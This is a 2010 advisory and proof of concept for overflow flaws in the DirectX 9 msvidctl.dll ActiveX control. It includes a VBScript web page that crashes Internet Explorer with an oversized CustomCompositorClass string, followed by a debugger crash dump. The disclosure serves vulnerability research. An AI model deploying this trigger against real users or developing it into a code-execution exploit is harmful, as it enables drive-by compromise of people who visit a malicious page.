============================================================================================

                   Microsoft DirectX 9 Video Mixer Renderer(msvidctl.dll) ActiveX Multiple Remote Vulnerabilities
                     ===========================================================================================

                                                     by

                                            Asheesh Kumar Mani Tripathi


# Vulnerability Discovered By Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company       www.aksitservices.co.in

# Credit by Asheesh Anaconda 

# Date 25th Sep 2010

# Description: Microsoft DirectX 9 Video Mixer Renderer ActiveX object corresponding to msvidctl.dll is susceptible to                       multiple vulnerabilities, including buffer overflow and integer overflow vulnerabilities.

                An attacker can exploit this issue by enticing an unsuspecting user to view a malicious webpage.
                Successful exploits will allow the attacker to execute arbitrary code within the context of the 
                application (typically Internet Explorer) that uses the ActiveX control.

                 It calls CustomCompositorClas in a separate thread. The classid of the affected ActiveX control is 
                 24DC3975-09BF-4231-8655-3EE71F43837D. By enticing a user to visit a malicious page, an attacker can exploit                  this vulnerability in order to execute arbitrary code on a target's machine. 
             

=============================================Proof Of Concept=============================================


<object classid='clsid:24DC3975-09BF-4231-8655-3EE71F43837D' id='ash' />
<script language='vbscript'>

targetFile = "C:\Windows\System32\msvidctl.dll"
prototype  = "Property Let CustomCompositorClass As String"
memberName = "CustomCompositorClass"
progid     = "MSVidCtlLib.MSVidVMR9"
argCount   = 1

arg1=String(12308, "A")

ash.CustomCompositorClass = arg1

</script>


=============================================Detail =============================================


Exception Code: VC_THROW_SEH
Disasm: 7752FBAE  LEAVE

Seh Chain:
--------------------------------------------------
1   60BB87E5   MSVidCtl.DLL
2   6C312960   VBSCRIPT.dll
3   77B699FA   ntdll.dll


Called From                   Returns To                    
--------------------------------------------------
KERNEL32.7752FBAE             msvcrt.763132FF               
msvcrt.763132FF               MSVidCtl.60B007A8             
MSVidCtl.60B007A8             MSVidCtl.60B60250             
MSVidCtl.60B60250             MSVidCtl.60B50DB8             
MSVidCtl.60B50DB8             OLEAUT32.7779546D             
OLEAUT32.7779546D             OLEAUT32.7779565E             
OLEAUT32.7779565E             OLEAUT32.77795D7C             
OLEAUT32.77795D7C             MSVidCtl.60AFF6B6             
MSVidCtl.60AFF6B6             VBSCRIPT.6C2C3EB7             
VBSCRIPT.6C2C3EB7             VBSCRIPT.6C2C3E27             
VBSCRIPT.6C2C3E27             VBSCRIPT.6C2C3397             
VBSCRIPT.6C2C3397             VBSCRIPT.6C2C3D88             
VBSCRIPT.6C2C3D88             VBSCRIPT.6C2D1302             
VBSCRIPT.6C2D1302             VBSCRIPT.6C2C63EE             
VBSCRIPT.6C2C63EE             VBSCRIPT.6C2C6373             
VBSCRIPT.6C2C6373             VBSCRIPT.6C2C6BA5             
VBSCRIPT.6C2C6BA5             VBSCRIPT.6C2C6D9D             
VBSCRIPT.6C2C6D9D             VBSCRIPT.6C2C5103             
VBSCRIPT.6C2C5103             SCROBJ.6CAF43F1               
SCROBJ.6CAF43F1               SCROBJ.6CAF49AA               
SCROBJ.6CAF49AA               SCROBJ.6CAF4845               
SCROBJ.6CAF4845               SCROBJ.6CAF47E2               
SCROBJ.6CAF47E2               SCROBJ.6CAF47A7               
SCROBJ.6CAF47A7               A23C33                        
A23C33                        A16AD4                        
A16AD4                        A13158                        
A13158                        A122D7                        
A122D7                        A15182                        
A15182                        A15430                        
A15430                        KERNEL32.7753D0E9             
KERNEL32.7753D0E9             ntdll.77BA19BB                
ntdll.77BA19BB                ntdll.77BA198E                


Registers:
--------------------------------------------------
EIP 7752FBAE -> E06D7363 -> Asc: csmcsm
EAX 0013E95C -> E06D7363 -> Asc: csmcsm
EBX 60AFACE8 -> 60B9C8EC
ECX 00000003
EDX 00000000
EDI 0013EAA4 -> AD2D71FC
ESI 0013EA94 -> 00000000
EBP 0013E9AC -> 0013E9E4
ESP 0013E95C -> E06D7363 -> Asc: csmcsm


Block Disassembly: 
--------------------------------------------------
7752FB9B  PUSH EAX
7752FB9C  CALL 7753A4D7
7752FBA1  ADD ESP,C
7752FBA4  LEA EAX,[EBP-50]
7752FBA7  PUSH EAX
7752FBA8  CALL [774F1714]
7752FBAE  LEAVE    <--- CRASH
7752FBAF  RETN 10
7752FBB2  NOP
7752FBB3  NOP
7752FBB4  NOP
7752FBB5  NOP
7752FBB6  NOP
7752FBB7  MOV EDI,EDI
7752FBB9  PUSH EBP


ArgDump:
--------------------------------------------------
EBP+8  E06D7363
EBP+12  00000001
EBP+16  00000003
EBP+20  0013E9D8 -> 19930520
EBP+24  E06D7363
EBP+28  00000001


Stack Dump:
--------------------------------------------------
13E95C 63 73 6D E0 01 00 00 00 00 00 00 00 AE FB 52 77  [csm...........Rw]
13E96C 03 00 00 00 20 05 93 19 F8 E9 13 00 4C F3 BB 60  [............L..`]
13E97C 7F 00 00 00 1D 01 04 18 D8 08 00 00 00 00 00 00  [................]
13E98C 20 00 00 00 00 37 1F 00 18 00 00 00 63 01 00 50  [............c..P]
13E99C 00 37 1F 00 E6 71 BC 77 FF 36 1F 00 FA 36 1F 00  [.....q.w........]



ApiLog
--------------------------------------------------

***** Installing Hooks *****